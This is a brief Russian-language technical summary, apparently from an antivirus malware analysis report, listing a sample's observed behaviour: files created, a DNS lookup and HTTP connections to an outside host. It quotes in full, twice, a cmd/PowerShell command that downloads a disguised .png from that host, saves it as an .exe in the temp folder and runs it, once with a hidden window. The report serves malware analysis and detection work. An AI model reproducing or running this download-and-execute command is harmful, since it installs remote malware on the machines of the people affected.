Техническая информация
- http://alsawmala.com/dsffcgjntntdcad.png как %temp%\wwdwxf.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://alsawmala.com/dsffcgjntntdcad.png','%TMP%\Wwdwxf.exe');Start-Process '%TMP%\Wwdwxf.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1352
- %TEMP%\1021962.cvr
- 'al###mala.com':80
- http://al###mala.com/dsffcgjntntdcad.png
- DNS ASK al###mala.com
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://alsawmala.com/dsffcgjntntdcad.png','%TMP%\Wwdwxf.exe');Start-Process '%TMP%\Wwdwxf.exe'; (со скрытым окном)